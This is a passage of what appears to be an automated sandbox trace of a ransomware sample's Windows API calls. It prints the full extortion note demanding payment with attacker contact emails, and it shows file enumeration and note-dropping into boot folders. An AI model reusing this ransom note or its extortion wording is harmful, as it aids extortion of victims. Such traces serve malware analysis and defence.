worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.448] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.448] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.449] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*" (normalized: "c:\\boot\\pl-pl\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.450] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.450] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.450] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned=".mui" [0188.450] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.451] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.451] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.452] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.452] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.489] RtlAllocateHeap 